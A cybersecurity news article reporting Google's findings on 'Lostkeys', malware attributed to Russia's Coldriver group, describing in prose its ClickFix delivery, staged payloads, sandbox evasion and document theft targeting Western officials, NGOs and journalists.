Cyberwarfare / Nation-State Attacks
,
Fraud Management & Cybercrime
Malware Targets Western Officials, NGOs and Journalists
Russian cyber espionage hackers are using a new malware strain dubbed “Lostkeys” in a targeted espionage campaign aimed at Western officials, NGOs and journalists.
See Also: OnDemand | North Korea’s Secret IT Army and How to Combat It
Google researchers attribute Lostkeys to the threat group Coldriver, also tracked as UNC4057, Star Blizzard and Callisto. The group, an operational unit within the Federal Security Service – Russian successor of the KGB – is known for credential phishing attacks. Lostkeys is evidence that the group has improved its capabilities with a multi-stage infection chain designed to steal documents and harvest sensitive data.
Members of the threat group have been indicted in the U.S. and sanctioned in Europe, Britain and the U.S. A December 2023 warning published by English-speaking countries that make up the Five Eyes intelligence alliance warned that the group continues to be active (see: UK and US Accuse Russian FSB of ‘Hack and Leak’ Operation).
Lostkeys marks a new tool in Coldriver’s arsenal, representing an evolution from credential theft to full system infiltration, the Google Threat Intelligence Group said. The group uses the malware selectively, only deployed in high-value targets, the report said.
Google observed Lostkeys activity in January, March and April, with indicators suggesting the malware may have first appeared as early as December 2023. Coldriver’s typical targets include former and current Western government advisors, think tanks, NGOs, journalists and individuals with ties to Ukraine.
The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt, a technique dubbed “ClickFix” (see: ClickFix Attacks Increasingly Lead to Infostealer Infections).
The method of social engineering circumvents traditional security controls and relies heavily on user compliance. Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but requiring unique identifiers per victim.
The malware shows signs of sandbox evasion. Before advancing to the final stage, the second-stage code checks the device’s display resolution hash and halts execution if it matches a known virtual machine setup.
The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker. The script is decoded using a two-key substitution cipher, with each key pair unique to every infection chain.
Lostkeys is reminiscent of Spica, a previous malware strain used by Coldriver in 2024. While Spica was also designed for data theft, Lostkeys shows a refined architecture and more advanced delivery mechanisms.
Although some Lostkeys samples dated back to December 2023 mimicked the Maltego software package and used Portable Executable files instead of PowerShell, Google could not confirm whether those early versions were part of the same operation or repurposed malware used by another group.